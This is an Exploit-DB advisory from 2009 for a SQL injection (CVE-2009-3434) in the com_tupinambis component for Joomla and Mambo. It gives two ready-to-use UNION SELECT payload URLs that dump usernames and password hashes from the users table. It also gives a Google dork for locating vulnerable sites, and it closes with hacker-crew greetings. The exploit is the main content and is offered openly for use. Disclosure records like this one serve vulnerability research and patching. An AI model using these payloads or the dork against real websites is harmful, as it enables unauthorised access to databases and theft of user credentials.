Joomla/Mambo Tupinambis SQL Injection

2009-09-22T00:00:00
ID EDB-ID:9832
Type exploitdb
Reporter Don Tukulesto
Modified 2009-09-22T00:00:00

Description

Joomla/Mambo Tupinambis SQL Injection. CVE-2009-3434. Webapps exploit for php platform

                                        
                                            #######################################################
## Mambo/Joomla SQL Injection Vulneralbility         ##
## Component : com_tupinambis 		             ##
## Release : September 23, 2009		     	     ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-.   .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |-  \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################

[+] Author	: Don Tukulesto
[+] Homepage	: http://www.indonesiancoder.com
[+] Location	: Republik Indonesia

#######################################################

[ Software Information ]

[+] Software      : com_tupinambis
[+] Version	  : 1.0
[+] Vendor	  : www.tupinambis.net
[+] Download	  : http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork   : inurl:"com_tupinambis"

#######################################################
[ ExPL0!T ]

[+] Mambo : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+mos_users--

[+] Joomla : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+jos_users--

#######################################################

[ Greetings ]

[+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
    Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55, Den Awink
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L,
[+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!!

[ SHOUT ]

Happy Eidul Fitri 1430H.

Minal Aidin Wal Faidzin.

[ SP3C!AL ]

lovely Emak, Bapak, Adek ku sayang (^_^)